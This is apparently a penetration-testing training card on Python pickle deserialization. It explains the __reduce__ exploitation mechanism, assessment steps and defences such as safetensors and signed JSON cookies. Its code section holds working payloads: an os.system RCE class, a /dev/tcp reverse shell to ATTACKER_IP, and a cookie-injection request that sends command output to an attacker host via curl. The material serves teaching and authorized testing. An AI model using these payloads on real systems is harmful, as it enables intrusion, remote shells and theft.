Pickle deserialization

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Python's pickle module is the de-facto serialization mechanism in the data science and machine learning ecosystem, and its exploitation surface has expanded dramatically as ML model files (.pkl, .pt, .joblib) are shared via public model hubs. CVE-2014-1912 demonstrated pickle deserialization in a widely used Python library. More recently, researchers from Trail of Bits and HiddenLayer documented that PyTorch .pt files and scikit-learn .pkl files loaded from untrusted sources (Hugging Face Hub, S3 buckets, email attachments) execute arbitrary Python code during torch.load() or joblib.load() — no exploit sophistication required. Any web application that accepts serialized Python objects — in cookies, API parameters, file uploads, or ML model endpoints — is potentially vulnerable.

Core Concept

The pickle protocol is a stack-based virtual machine that reconstructs Python object graphs from a byte stream. During reconstruction, pickle calls __reduce__() on objects that define it. The return value of __reduce__() is a tuple (callable, args) that pickle invokes as callable(*args). Because there is no restriction on which callable or args are used, an attacker who controls the pickle stream can specify os.system as the callable and any shell command string as the argument.

The __reduce__ method is the standard exploitation primitive. A malicious pickle is constructed by serializing an object whose __reduce__ returns (os.system, ("id",)). When pickle.loads() processes this byte stream, it calls os.system("id") — arbitrary code execution with the privileges of the Python process.

Magic bytes for pickle streams: - Protocol 0 (ASCII): begins with the opcode character ( or c. - Protocol 2: begins with x80x02. - Protocol 4: begins with x80x04. - Protocol 5: begins with x80x05.

Cloudpickle and dill extend pickle and are equally vulnerable — they serialize closures and lambdas, giving attackers even more expressive payloads.

Safe alternatives: json, msgpack, protobuf, and orjson do not support arbitrary object instantiation. For ML models, safetensors is the format specifically designed to eliminate the pickle attack surface. Never call pickle.loads(), joblib.load(), or torch.load() on data from an untrusted source without cryptographic provenance verification (signing + signature check before loading).

Technical Deep-Dive

# ── Crafting a malicious pickle payload ───────────────────────────────────
import pickle, os, base64

class RCEPayload:
    """Malicious class — __reduce__ executes a shell command on deserialization."""
    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # pickle calls: os.system(self.command) during loads()
        return (os.system, (self.command,))

# Payload 1: simple command execution
payload = pickle.dumps(RCEPayload("id > /tmp/rce_proof.txt"))
print("[+] Raw payload bytes (hex):", payload.hex())
print("[+] Base64:", base64.b64encode(payload).decode())
# b64 will begin with gASV... (protocol 4) or gAJ... (protocol 2)

# Payload 2: reverse shell via subprocess
import subprocess

class RevShell:
    def __reduce__(self):
        cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
        return (subprocess.check_output, (["/bin/bash", "-c", cmd],))

revshell_payload = pickle.dumps(RevShell())
print("[+] Reverse shell payload (b64):", base64.b64encode(revshell_payload).decode())

# ── Detection: identify pickle magic bytes in a cookie or parameter ────────
import sys

def is_pickle(data: bytes) -> bool:
    return data[:2] in (b'x80x02', b'x80x03', b'x80x04', b'x80x05')

# Test against a cookie value
cookie_value = "gASVIAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
raw = base64.b64decode(cookie_value)
print("Is pickle?", is_pickle(raw))   # True

# ── Exploitation via cookie injection ─────────────────────────────────────
import requests

payload_b64 = base64.b64encode(pickle.dumps(RCEPayload("curl http://ATTACKER/$(id)"))).decode()
resp = requests.get(
    "https://app.example.com/dashboard",
    cookies={"session": payload_b64},
)
print(resp.status_code, resp.text[:200])

# ── Safe alternatives ──────────────────────────────────────────────────────
import json

# JSON: safe, no object instantiation
safe_data = json.loads(json.dumps({"user": "alice", "role": "admin"}))

# For ML models: use safetensors instead of torch.load()
# pip install safetensors
# from safetensors import safe_open

# Check for pickle magic bytes in captured HTTP traffic
# In Burp: Decoder tab → base64 decode a cookie → view as hex
# Magic bytes to look for: 80 02, 80 03, 80 04, 80 05

# Automated scan: look for b64-encoded pickles in all parameters
grep -oP "[A-Za-z0-9+/]{40,}={0,2}" requests.txt | while read b64; do
    decoded=$(echo "$b64" | base64 -d 2>/dev/null | xxd | head -1)
    echo "$decoded" | grep -q "8002|8003|8004|8005" && echo "[PICKLE] $b64"
done

Security Assessment Methodology

Identify Python application indicators — Check X-Powered-By, error tracebacks (Python stack traces expose framework and Python version), file extensions (.py, .wsgi), and dependency files (requirements.txt, Pipfile).
Search for serialized data in all cookie values and parameters — Base64-decode every cookie and opaque parameter. Check for pickle magic bytes (x80x02 through x80x05). Also search for .pkl, .pickle, .pt, .joblib in file upload endpoints.
Craft a safe detection payload (OOB DNS) — Build a pickle that executes nslookup YOUR.burpcollab.net or curl http://YOUR.interactsh.com. Submit and monitor for DNS callback. This confirms deserialization without writing files.
Escalate to command execution — Replace the DNS payload with id > /tmp/pickle_rce_proof. Confirm file creation via a subsequent read (if the app has a file-reading endpoint) or via a web-accessible path.
Test ML model upload endpoints — If the application accepts model file uploads, submit a .pkl or .pt file containing a malicious pickle. Observe for OOB callback on model loading.
Test all serialization libraries — If cloudpickle or dill is in requirements.txt, test with those libraries' serialization format as well (they share the pickle protocol).

Defensive Countermeasure — Never call pickle.loads() on data from any untrusted source. Replace pickle-based session cookies with cryptographically signed JSON (e.g., Flask's itsdangerous with TimestampSigner). For ML model distribution, enforce safetensors format and verify a cryptographic signature (SHA-256 hash + signature from a trusted registry) before loading any model file. Add import pickle to a static analysis forbidden-import list in CI.

Common Assessment Errors

Assuming only cookies are affected — Pickles appear in POST body parameters, URL query strings, file uploads, and even Redis/Memcached cache values that the application later deserializes. Check all data paths.
Forgetting that dill and cloudpickle are equally vulnerable — If pickle is replaced with dill or cloudpickle, the vulnerability is identical. Search for all three in requirements.txt.
Using a blocking payload in a blind context — os.system() blocks until the command completes. A reverse shell payload will hang the request. Use OOB (curl/DNS) for blind contexts to avoid detection and denial-of-service.
Missing ML model endpoints — torch.load(), joblib.load(), and numpy.load() with allow_pickle=True all call pickle.loads() internally. Model upload and load endpoints are often forgotten in assessments.
Not checking the protocol version — Protocol 0 pickles (ASCII-based, no magic bytes) can be injected in contexts where binary bytes are not allowed. Check for lines starting with ( or c in text-based parameters.
Assuming safe_load equivalents exist for pickle — Unlike PyYAML (which has safe_load), Python's pickle has no safe loading mode. The entire protocol is unsafe for untrusted input.

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains the `__reduce__` mechanism that makes pickle deserialization inherently unsafe
K0070	Knowledge of system and application security threats and vulnerabilities	Connects pickle RCE to the ML model supply chain threat landscape
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains magic byte detection and OOB-first confirmation methodology
S0044	Skill in mimicking threat behaviors to test defenses	Develops pickle payload crafting skill using Python's own serialization API
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a complete methodology from detection through RCE confirmation
T0591	Perform penetration testing as required for new or updated applications	Frames pickle testing as required for Python applications and ML endpoints